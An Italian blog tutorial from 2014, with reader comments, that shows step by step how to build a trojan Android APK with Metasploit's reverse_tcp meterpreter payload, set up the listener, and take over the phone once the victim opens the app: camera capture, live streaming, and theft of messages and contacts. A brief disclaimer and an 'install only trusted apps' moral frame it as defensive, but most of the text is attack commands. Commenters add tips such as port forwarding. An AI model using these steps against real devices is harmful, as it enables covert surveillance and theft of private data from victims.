Hacking Android: Kali Linux e Metasploit! [Guida]

Hacking Android? Conosci il nemico e impara a difenderti!

Avvisiamo i lettori che questa guida non è creata per incoraggiarvi all’hacking android! Prendetela come guida informativa per difendervi da certi attacchi informatici!

Android è uno dei sistemi operativi per smartphone più usati al mondo e quindi è anche uno dei più soggetti ad attacchi informatici! Con questa vi mostriamo uno dei vari modi in cui può agire un hacker in questi casi!

Ovviamente tutto ciò che riportiamo sarà eseguito esclusivamente tramite terminale.

Strumenti richiesti:

  1. Framework metasploit (in questo caso useremo Kali Linux, distro dedicata al pentesting).
  2. Un qualsiasi smartphone android.
  3. Una rete wifi (l’attacco sarà eseguito in LAN, ma con apposite modifiche sarà possibile anche in remoto).
  4. Una minima conoscenza nel campo.

Creazione apk “virus”.

In questa guida useremo metasploit, e tramite questo primo comando andremo a creare l’apk del virus che poi andrà installato sullo smartphone!

msfpayload android/meterpreter/reverse_tcp <ip_attaccante> LPORT=<porta_da_cui_ricevere_la_connessione> R > <nome_a_piacere>.apk

kali linux, android kali linux, hacking android

Dal codice (lo screenshot ha una qualità altissima) si nota che il nostro payload sarà un reverse_tcp e questo prevede che l’attaccato si colleghi con l’attaccante (in questo caso aprendo l’applicazione) e che l’attaccante si prepari a ricevere la connessione.

Configurazione della console Metasploit.

Avviamo la console:

msfconsole

Ci vorrà un po’ di tempo, abbiate pazienza.
Configuriamo il tutto:

use exploit/multi/handler

set payload android/meterpreter/reverse_tcp

kali linux, android kali linux, hacking android

set lhost <ip_attaccante>

set lport <porta_da_cui_ricevere_la_connessione>

kali linux, android kali linux, hacking android

Naturalmente le informazioni inserite devono corrispondere con quelle inserite nell’apk precedentemente creato.

Inizio dell’attacco.

Intanto consiglio di digitare:

show options

kali linux, android kali linux, hacking android

che vi permetterà di avere un riepilogo della situazione e controllare di avere operato nel modo giusto.

Se tutto torna siamo pronti! Basta digitare:

exploit

kali linux, android kali linux, hacking android

Quando dallo smartphone sarà aperta l’applicazione vi appariranno delle scritte e quindi la scritta:

meterpreter

Questo vuol dire che siete dentro! Basterà digitare:

help

e avrete la lista di tutti i comandi utilizzabili!
Potrete fare qualsiasi cosa, come ad esempio catturare delle fotografie dalla fotocamera, avviare uno streaming in live dalla fotocamera, scaricare la lista di tutti i messaggi, la rubrica e quant’altro!

Morale della favola:

non installate applicazioni provenienti da fonti non attendibili! Assicuratevi sempre e verificate che non si tratti di qualcosa del genere!

Se avete trovato termini a voi sconosciuti vi rimando alla solita enciclopedia del modding!

Cosa ne pensate? Vi è stata utile questa guida? Scriveteci nei commenti!

Hacking Android: Kali Linux e Metasploit! [Guida] ultima modifica: 2014-11-10T12:09:53+00:00 da Salvatore Giordano

migliori servizi AndroidMigliori rubriche e servizi offerti da Tuttoapp-android:
A) Pubblicizzare applicazioni in maniera professionale ed efficiente;
B) Migliori smartphone Android (con prezzi aggiornati ogni 5 ore);
C) Migliori tablet Android.

Salvatore Giordano

Salvatore Giordano! 19enne studente di ingegneria e da sempre smanettone di tecnologia! Scrivo per www.tuttoapp-android.com come prima esperienza! Android è casa mia!

  • Tobia

    L’apk creato non viene installato dal sistema android che da “errore analisi del pacchetto”. Come devo fare?

  • Eugenio

    -.- ennesimo copia e incolla senza sapere un beneamato 01100011 01100001 01111010 01111010 01101111 ? oppure è stato postato durante un attacco di scoglionamento?

    In molti lo fanno apposta per confondere le idee di chi è alle prime armi.
    • C’è da spiegare bene come settare la back_door da inviare (di cui bisogna capire se “LHOST” intende IPv4 o IPv6 – per intenderci 192.168.xx.xx oppure 89.31.XX.XX).
    • Spiegare come scegliere l’exploit adatto (quindi capire come si usa Nmap e il search di metasploit)
    • Il settaggio della payload nella “console” specificando sia (RHOST) IP vittima
    sia (LHOST) IP attaccante… ….(ma IPv4 o IPv6?)
    • Settare le porte sia la (LPORT) porta locale (dell’attaccante)
    sia la (RPORT) porta remota (della vittima)
    =======================================
    Normalmente in una LAN basterebbero solo gli IPv4 poichè non dobbiamo uscire fuori dalla rete domestica/aziendale.
    • Potrebbe essere necessario il port_forwarding (aprire le porte sul router) e abilitare nuove regole di connessione sulle porte (tramite impostazioni Firewall)
    • Poi c’è da considerare che se si effettua l’hack da una macchina virtuale potrebbe non andare a buon fine per cause che ancora non ho capito molto bene (possibile mancanza di RAM e/o potenza della CPU).
    • Problema risolvibile facendo girare il sistema operativo che avete scelto su chiave usb-bootable e settare l’ordine hardware di avvio del bios mettendo la chiave usb al primo posto.
    • Per altre info “google” e/o testi sull’utilizzo di metasploit e/o Tutorials online (purtroppo solo in inglese).

    • Studiare sempre e comunque. Il sapere è un arma a doppio taglio, fatene buon uso e state attenti.

    Detto questo vi saluto, spero possa aiutare qualcuno

  • Marco

    Grazie per la guida ma una domanda… se nel payload devo mettere l’ip (lhost) dell’attaccante ovvero colui che spedisce l’attacco esso come fa a avere una connessione con l’attaccato ovvero colui che subisce l’attacco se non si immette ne ip della rete dell’attaccato??? Attendo risposta.
    Grazie

    • http://www.tuttoapp-android.com/ Giovan Giuseppe Ferrandino

      Credo che ci siamo già sentiti per assistenza tramite Whatsapp, dico bene?

    • Katia Albioni

      Marco ha ragione. Così come hai presentato la guida è furviante. Ti sei dimenticato di spiegare come si invia l’.apk. Che è il “cuore” di tutto questo. Il fatto è che non lo sai.

  • Io

    Non ho capito bene come creare un payload …

    • http://www.tuttoapp-android.com/ Giovan Giuseppe Ferrandino

      Caro Emanuele,

      sarà lo stesso Salvatore, autore dell’articolo cui giro la tua domanda, a risponderti quanto prima.

      A presto,

      Giovan Giuseppe Ferrandino

  • Pingback: [GUIDA parte 1] Impostazioni del Kernel - Governor()

Shares